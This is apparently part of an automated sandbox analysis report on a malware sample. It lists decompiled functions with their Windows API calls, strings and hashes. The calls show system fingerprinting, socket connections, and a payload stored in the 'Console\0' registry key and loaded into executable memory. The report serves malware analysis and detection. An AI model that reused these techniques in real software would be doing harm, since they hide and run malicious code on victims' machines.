                                                                                                                            Function 036280F0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 114stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 03628132
                                                                                                                            • lstrcmpiW.KERNEL32(?,A:\), ref: 03628166
                                                                                                                            • lstrcmpiW.KERNEL32(?,B:\), ref: 03628176
                                                                                                                            • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 036281A6
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 036281B7
                                                                                                                            • __wcsnicmp.LIBCMT ref: 036281CE
                                                                                                                            • lstrcpyW.KERNEL32(00000AD4,?), ref: 03628204
                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 03628228
                                                                                                                            • lstrcatW.KERNEL32(?,00000000), ref: 03628233
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
                                                                                                                            • String ID: A:\$B:\
                                                                                                                            • API String ID: 950920757-1009255891
                                                                                                                            • Opcode ID: 02e48585170d9ac2464ea7b7cffb637baecb6767b3260cab780a2cd19bbaf558
                                                                                                                            • Instruction ID: 7b6ba78f6efa943af001749c0adbf76a91b4c55029b355a14050077754fe4227
                                                                                                                            • Opcode Fuzzy Hash: 02e48585170d9ac2464ea7b7cffb637baecb6767b3260cab780a2cd19bbaf558
                                                                                                                            • Instruction Fuzzy Hash: 4941E875E01628DBDB20DF60DD94AEEBBBCEF44700F054499EA0AA7244E770DA05CF98
                                                                                                                            Function 03626790 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 116memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 03625320: InterlockedDecrement.KERNEL32(00000008), ref: 0362536F
                                                                                                                              • Part of subcall function 03625320: SysFreeString.OLEAUT32(00000000), ref: 03625384
                                                                                                                              • Part of subcall function 03625320: SysAllocString.OLEAUT32(03645148), ref: 036253D5
                                                                                                                            • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,03645148,036269A4,03645148,00000000,75BF73E0), ref: 036267F4
                                                                                                                            • GetLastError.KERNEL32 ref: 036267FE
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 03626816
                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0362681D
                                                                                                                            • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 0362683F
                                                                                                                            • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 03626871
                                                                                                                            • GetLastError.KERNEL32 ref: 0362687B
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 036268E6
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 036268ED
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
                                                                                                                            • String ID: NONE_MAPPED
                                                                                                                            • API String ID: 1317816589-2950899194
                                                                                                                            • Opcode ID: d4b3d7eeff6653d8f30bfb92e494d44b9d581d211a217e7b27bda547a6868d16
                                                                                                                            • Instruction ID: 43dd75d14e5bdfae969414687092346894ad6e9470a5b8afcd76a00f4e9cdeeb
                                                                                                                            • Opcode Fuzzy Hash: d4b3d7eeff6653d8f30bfb92e494d44b9d581d211a217e7b27bda547a6868d16
                                                                                                                            • Instruction Fuzzy Hash: 2E41A3B5A00628ABD720DB60DD54FAEBB78EB85700F40449CFB09A6144DBB45E858F74
                                                                                                                            Function 03626C50 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 99COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetDriveTypeW.KERNEL32(?,74DEDF80,00000000,75BF73E0), ref: 03626C8B
                                                                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 03626CAA
                                                                                                                            • _memset.LIBCMT ref: 03626CE1
                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 03626CF4
                                                                                                                            • swprintf.LIBCMT ref: 03626D39
                                                                                                                            • swprintf.LIBCMT ref: 03626D4C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
                                                                                                                            • String ID: %sFree%d Gb $:$@$HDD:%d
                                                                                                                            • API String ID: 3202570353-3501811827
                                                                                                                            • Opcode ID: eed9c2e71c2961c63d3688ccbb837b6f560712646d9ab50a5d0d7eb333856b32
                                                                                                                            • Instruction ID: df5e38a18adbe87a2c64048ceba6061b745361a73d09873f47989497322e1695
                                                                                                                            • Opcode Fuzzy Hash: eed9c2e71c2961c63d3688ccbb837b6f560712646d9ab50a5d0d7eb333856b32
                                                                                                                            • Instruction Fuzzy Hash: 48318DB6E0021C9BDB10DFE5CC45BEEBBB8FB48300F51421DEA1AAB240E7745905CB94
                                                                                                                            Function 03626EE0 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 410COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateDXGIFactory.DXGI(0364579C,?,95401134,74DEDF80,00000000,75BF73E0), ref: 03626F4A
                                                                                                                            • swprintf.LIBCMT ref: 0362711E
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 036271C7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFactoryXinvalid_argumentstd::_swprintf
                                                                                                                            • String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
                                                                                                                            • API String ID: 3803070356-257307503
                                                                                                                            • Opcode ID: b9cf20ef2b13be8fce20acd64a475607e4ba5e91536bcfcf8593cbfce4d730bf
                                                                                                                            • Instruction ID: ff0aaeae1ce42e302bc1590c69354776f6c2dc51b945e39d031f28e5a5affbb2
                                                                                                                            • Opcode Fuzzy Hash: b9cf20ef2b13be8fce20acd64a475607e4ba5e91536bcfcf8593cbfce4d730bf
                                                                                                                            • Instruction Fuzzy Hash: 7AE16171E016359FDF24CE64CD80FEEB775AB89700F1942E9D90AA7385D670AE818F90
                                                                                                                            Function 02C354C0 Relevance: 45.8, APIs: 16, Strings: 10, Instructions: 263registrymemorysleepCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,00020019,?), ref: 02C35507
                                                                                                                            • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 02C3552E
                                                                                                                            • _memset.LIBCMT ref: 02C35548
                                                                                                                            • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 02C35563
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 02C35586
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02C355B1
                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02C35605
                                                                                                                            • _memset.LIBCMT ref: 02C35669
                                                                                                                            • _memset.LIBCMT ref: 02C3568D
                                                                                                                            • _memset.LIBCMT ref: 02C3569F
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 02C35726
                                                                                                                            • RegCreateKeyW.ADVAPI32(80000001,Console\0,?), ref: 02C35799
                                                                                                                            • RegDeleteValueW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4), ref: 02C357AC
                                                                                                                            • RegSetValueExW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000065), ref: 02C357C4
                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 02C357CE
                                                                                                                            • Sleep.KERNEL32(00000BB8), ref: 02C357FE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
                                                                                                                            • String ID: !jWW$.$0d3b34577c0a66584d5bdc849e214016$9e9e85e05ee16fc372a0c7df6549fbd4$Console\0$_$e$i$l${vU_
                                                                                                                            • API String ID: 354323817-737951744
                                                                                                                            • Opcode ID: c450282505fd281f9c4c8934b55dd889cd746892e042020ba7aaab6f6a1646a9
                                                                                                                            • Instruction ID: d4a013a07119568b37847c83aeb14be6054f2cfe7d7676578ede7858d5e5448c
                                                                                                                            • Opcode Fuzzy Hash: c450282505fd281f9c4c8934b55dd889cd746892e042020ba7aaab6f6a1646a9
                                                                                                                            • Instruction Fuzzy Hash: 1A91A479E40304ABE721DF60DC84FAB77BAEB89744F504959F909AB240D771AB40CF91
                                                                                                                            Function 03629E50 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 314windowCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 488 3629e50-3629e85 GdipGetImagePixelFormat 489 3629e87 488->489 490 3629e8a-3629eb1 488->490 489->490 491 3629eb3-3629ec3 490->491 492 3629ec9-3629ecf 490->492 491->492 493 3629ed1-3629ee1 492->493 494 3629eeb-3629f04 GdipGetImageHeight 492->494 493->494 495 3629f06 494->495 496 3629f09-3629f2c GdipGetImageWidth 494->496 495->496 497 3629f31-3629f4e call 3629c30 496->497 498 3629f2e 496->498 501 3629f54-3629f68 497->501 502 362a055-362a05a 497->502 498->497 503 3629f6e-3629f87 GdipGetImagePaletteSize 501->503 504 362a0cf-362a0d7 501->504 505 362a2a4-362a2ba call 362f00a 502->505 509 3629f89 503->509 510 3629f8c-3629f98 503->510 507 362a20a-362a27b GdipCreateBitmapFromScan0 GdipGetImageGraphicsContext GdipDrawImageI GdipDeleteGraphics GdipDisposeImage 504->507 508 362a0dd-362a11a GdipBitmapLockBits 504->508 516 362a281-362a283 507->516 514 362a14a-362a177 508->514 515 362a11c-362a121 508->515 509->510 511 3629fb2-3629fba 510->511 512 3629f9a-3629fa5 call 3629650 510->512 520 3629fd0-3629fd5 call 3621280 511->520 521 3629fbc-3629fca call 362f673 511->521 512->511 535 3629fa7-3629fb0 call 363c660 512->535 517 362a179-362a18e call 36307f2 514->517 518 362a1bf-362a1de GdipBitmapUnlockBits 514->518 522 362a123 515->522 523 362a140-362a145 515->523 524 362a2a2 516->524 525 362a285 516->525 540 362a200-362a205 call 3621280 517->540 541 362a190-362a197 517->541 518->516 529 362a1e4-362a1e7 518->529 538 3629fda-3629fe5 520->538 521->538 543 3629fcc-3629fce 521->543 531 362a12b-362a13e call 362f639 522->531 523->505 524->505 526 362a28d-362a2a0 call 362f639 525->526 526->524 546 362a287 526->546 529->516 531->523 552 362a125 531->552 545 3629fe7-3629fe9 535->545 538->545 540->507 541->540 547 362a1f6-362a1fb call 3621280 541->547 548 362a19e-362a1bd 541->548 549 362a1ec-362a1f1 call 3621280 541->549 543->545 553 362a016-362a030 GdipGetImagePalette 545->553 554 3629feb-3629fed 545->554 546->526 547->540 548->517 548->518 549->547 552->531 557 362a032-362a038 553->557 558 362a03b-362a040 553->558 555 3629fef 554->555 556 362a00c-362a011 554->556 561 3629ff7-362a00a call 362f639 555->561 556->505 557->558 562 362a042-362a048 558->562 563 362a04a-362a050 call 362cca0 558->563 561->556 571 3629ff1 561->571 562->563 565 362a05f-362a063 562->565 563->502 568 362a0a0-362a0c9 call 3629d80 SetDIBColorTable call 362a320 565->568 569 362a065 565->569 568->504 572 362a068-362a098 569->572 571->561 572->572 573 362a09a 572->573 573->568
                                                                                                                            APIs
                                                                                                                            • GdipGetImagePixelFormat.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03629E7B
                                                                                                                            • GdipGetImageHeight.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03629EFC
                                                                                                                            • GdipGetImageWidth.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03629F24
                                                                                                                            • GdipGetImagePaletteSize.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03629F7F
                                                                                                                            • _malloc.LIBCMT ref: 03629FC0
                                                                                                                              • Part of subcall function 0362F673: __FF_MSGBANNER.LIBCMT ref: 0362F68C
                                                                                                                              • Part of subcall function 0362F673: __NMSG_WRITE.LIBCMT ref: 0362F693
                                                                                                                              • Part of subcall function 0362F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76), ref: 0362F6B8
                                                                                                                            • _free.LIBCMT ref: 0362A000
                                                                                                                            • GdipGetImagePalette.GDIPLUS(?,00000008,?,?,00000000), ref: 0362A028
                                                                                                                            • SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000), ref: 0362A0B7
                                                                                                                            • GdipBitmapLockBits.GDIPLUS(Function_00009A30,?,00000001,?,?,?,00000000), ref: 0362A112
                                                                                                                            • _free.LIBCMT ref: 0362A134
                                                                                                                            • _memcpy_s.LIBCMT ref: 0362A183
                                                                                                                            • GdipBitmapUnlockBits.GDIPLUS(?,?,?,00000000), ref: 0362A1D0
                                                                                                                            • GdipCreateBitmapFromScan0.GDIPLUS(?,?,03645A78,00022009,?,00000000,?,00000000), ref: 0362A22C
                                                                                                                            • GdipGetImageGraphicsContext.GDIPLUS(00000000,00022009,?,00000000), ref: 0362A24C
                                                                                                                            • GdipDrawImageI.GDIPLUS(00000000,Function_00009A30,00000000,00000000,?,00000000), ref: 0362A267
                                                                                                                            • GdipDeleteGraphics.GDIPLUS(?,?,00000000), ref: 0362A274
                                                                                                                            • GdipDisposeImage.GDIPLUS(00000000,?,00000000), ref: 0362A27B
                                                                                                                            • _free.LIBCMT ref: 0362A296
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Gdip$Image$Bitmap_free$BitsGraphicsPalette$AllocateColorContextCreateDeleteDisposeDrawFormatFromHeapHeightLockPixelScan0SizeTableUnlockWidth_malloc_memcpy_s
                                                                                                                            • String ID: &
                                                                                                                            • API String ID: 640422297-3042966939
                                                                                                                            • Opcode ID: d423f7cf029198dc9e4e6fb905e4b460d0d3a8a90101aa65d4bc18fb96cffbe2
                                                                                                                            • Instruction ID: c8ee938b0a71d71562aaab7002a56684c576aa7613ac008a2b06702fc063283e
                                                                                                                            • Opcode Fuzzy Hash: d423f7cf029198dc9e4e6fb905e4b460d0d3a8a90101aa65d4bc18fb96cffbe2
                                                                                                                            • Instruction Fuzzy Hash: 0CD191B1A006299FCB20DF55CC90B9ABBF4FF88304F0585ACE60997301D770AA95CF68
                                                                                                                            Function 02C32D80 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203networkstringtimeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • ResetEvent.KERNEL32(?), ref: 02C32D9B
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02C32DA7
                                                                                                                            • timeGetTime.WINMM ref: 02C32DAD
                                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 02C32DDA
                                                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 02C32E06
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02C32E12
                                                                                                                            • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 02C32E31
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02C32E3D
                                                                                                                            • gethostbyname.WS2_32(00000000), ref: 02C32E4B
                                                                                                                            • htons.WS2_32(?), ref: 02C32E6D
                                                                                                                            • connect.WS2_32(?,?,00000010), ref: 02C32E8B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                                                            • String ID: 0u
                                                                                                                            • API String ID: 640718063-3203441087
                                                                                                                            • Opcode ID: fb5e61656e51c59e0b92eff49c4f1043215102ab6c4a7dc5608a66c0beb82d4b
                                                                                                                            • Instruction ID: 896bae40c66fc638840eccb5fbfd04d5fc782b9c65d0286ba38154905857bbc6
                                                                                                                            • Opcode Fuzzy Hash: fb5e61656e51c59e0b92eff49c4f1043215102ab6c4a7dc5608a66c0beb82d4b
                                                                                                                            • Instruction Fuzzy Hash: 3F6130B5A40304ABE720DFA4DC45FABB7F9FF58710F504A19F645A72C0D7B0A9048BA5
                                                                                                                            Function 03622DA0 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203networkstringtimeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • ResetEvent.KERNEL32(?), ref: 03622DBB
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 03622DC7
                                                                                                                            • timeGetTime.WINMM ref: 03622DCD
                                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 03622DFA
                                                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 03622E26
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03622E32
                                                                                                                            • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 03622E51
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03622E5D
                                                                                                                            • gethostbyname.WS2_32(00000000), ref: 03622E6B
                                                                                                                            • htons.WS2_32(?), ref: 03622E8D
                                                                                                                            • connect.WS2_32(?,?,00000010), ref: 03622EAB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                                                            • String ID: 0u
                                                                                                                            • API String ID: 640718063-3203441087
                                                                                                                            • Opcode ID: ac6e9980b7ad823909b57b3d0cdbc70ca14d0a21d644c76636de50cffc86bc49
                                                                                                                            • Instruction ID: 071dbe64f0937f74dcea11fd59893b1f0e7337295e35a7b3edcce34a087f3d05
                                                                                                                            • Opcode Fuzzy Hash: ac6e9980b7ad823909b57b3d0cdbc70ca14d0a21d644c76636de50cffc86bc49
                                                                                                                            • Instruction Fuzzy Hash: D5615DB5A40704ABE720EFA4DC55FAABBB8FF48B10F10451DF655AB284D7B0A9048B64
                                                                                                                            Function 0362AD10 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 346registryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 656 362ad10-362ad2b 657 362ad84-362ad8f 656->657 658 362ad2d-362ad5b RegOpenKeyExW 656->658 661 362b845-362b84b call 362ce00 657->661 662 362ad95-362ad9c 657->662 659 362ad79-362ad7e 658->659 660 362ad5d-362ad73 RegQueryValueExW 658->660 659->657 664 362b84e-362b854 659->664 660->659 661->664 665 362afe3-362b09b call 362f707 call 3636770 call 362eff4 call 3637660 call 362f707 call 362cf20 call 362eff4 662->665 666 362adea-362adf1 662->666 712 362b162-362b189 call 362fa29 CloseHandle 665->712 713 362b0a1-362b0ee call 3637660 RegCreateKeyW 665->713 666->664 669 362adf7-362ae29 call 362f707 call 3636770 666->669 678 362ae42-362ae4e 669->678 679 362ae2b-362ae3f wsprintfW 669->679 681 362ae50 678->681 682 362ae9a-362aef1 call 362eff4 call 3637660 call 3622ba0 call 362efff * 2 678->682 679->678 685 362ae54-362ae5f 681->685 689 362ae60-362ae66 685->689 692 362ae86-362ae88 689->692 693 362ae68-362ae6b 689->693 698 362ae8b-362ae8d 692->698 696 362ae82-362ae84 693->696 697 362ae6d-362ae75 693->697 696->698 697->692 701 362ae77-362ae80 697->701 702 362aef4-362af09 698->702 703 362ae8f-362ae98 698->703 701->689 701->696 706 362af10-362af16 702->706 703->682 703->685 709 362af36-362af38 706->709 710 362af18-362af1b 706->710 711 362af3b-362af3d 709->711 715 362af32-362af34 710->715 716 362af1d-362af25 710->716 717 362afae-362afe0 call 362fa29 CloseHandle call 362efff 711->717 718 362af3f-362af41 711->718 733 362b0f0-362b13f call 362eff4 call 3625a30 RegDeleteValueW RegSetValueExW 713->733 734 362b14a-362b15f RegCloseKey call 362fac9 713->734 715->711 716->709 722 362af27-362af30 716->722 724 362af43-362af4e call 362efff 718->724 725 362af55-362af5c 718->725 722->706 722->715 724->725 731 362af70-362af74 725->731 732 362af5e-362af69 call 362fac9 725->732 740 362af76-362af7f call 362efff 731->740 741 362af85-362afa9 call 362f020 731->741 732->731 733->734 752 362b141-362b147 call 362fac9 733->752 734->712 740->741 741->682 752->734
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 0362AD53
                                                                                                                            • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0362AD73
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: OpenQueryValue
                                                                                                                            • String ID: %s_bin$Console$Console\0$IpDatespecial
                                                                                                                            • API String ID: 4153817207-1338088003
                                                                                                                            • Opcode ID: 55aaf239e96221d57c6de7aa252d9cc292211b476d09639ae8a90c3efd6ed05d
                                                                                                                            • Instruction ID: 428e324893e5f5f66ff5e4d395004720389bb0c130d132162df6ff53ed02f543
                                                                                                                            • Opcode Fuzzy Hash: 55aaf239e96221d57c6de7aa252d9cc292211b476d09639ae8a90c3efd6ed05d
                                                                                                                            • Instruction Fuzzy Hash: 06C1F3B5A007109BE710EF24DC45F6B7BA8EF94704F0A052CF9499B381E7B5E905CBA6
                                                                                                                            Function 03626150 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 222stringcomregistryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 755 3626150-36261a5 call 3636770 call 363004b 760 3626201-3626228 CoCreateInstance 755->760 761 36261a7-36261ae 755->761 763 3626422-362642f lstrlenW 760->763 764 362622e-3626282 760->764 762 36261b0-36261b2 call 3626050 761->762 770 36261b7-36261b9 762->770 765 3626441-3626450 763->765 766 3626431-362643b lstrcatW 763->766 775 362640a-3626418 764->775 776 3626288-36262a2 764->776 768 3626452-3626457 765->768 769 362645a-362647a call 362f00a 765->769 766->765 768->769 772 36261db-36261ff call 363004b 770->772 773 36261bb-36261d9 lstrcatW * 2 770->773 772->760 772->762 773->772 775->763 777 362641a-362641f 775->777 776->775 782 36262a8-36262b4 776->782 777->763 783 36262c0-3626363 call 3636770 wsprintfW RegOpenKeyExW 782->783 786 36263e9-36263ff 783->786 787 3626369-36263ba call 3636770 RegQueryValueExW 783->787 790 3626402-3626404 786->790 791 36263dc-36263e3 RegCloseKey 787->791 792 36263bc-36263da lstrcatW * 2 787->792 790->775 790->783 791->786 792->791
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0362618B
                                                                                                                            • lstrcatW.KERNEL32(03651F10,0364510C,?,95401134,00000AD4,00000000,75BF73E0), ref: 036261CD
                                                                                                                            • lstrcatW.KERNEL32(03651F10,0364535C,?,95401134,00000AD4,00000000,75BF73E0), ref: 036261D9
                                                                                                                            • CoCreateInstance.OLE32(03642480,00000000,00000017,0364578C,?,?,95401134,00000AD4,00000000,75BF73E0), ref: 03626220
                                                                                                                            • _memset.LIBCMT ref: 036262CE
                                                                                                                            • wsprintfW.USER32 ref: 03626336
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0362635F
                                                                                                                            • _memset.LIBCMT ref: 03626376
                                                                                                                              • Part of subcall function 03626050: _memset.LIBCMT ref: 0362607C
                                                                                                                              • Part of subcall function 03626050: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 03626088
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
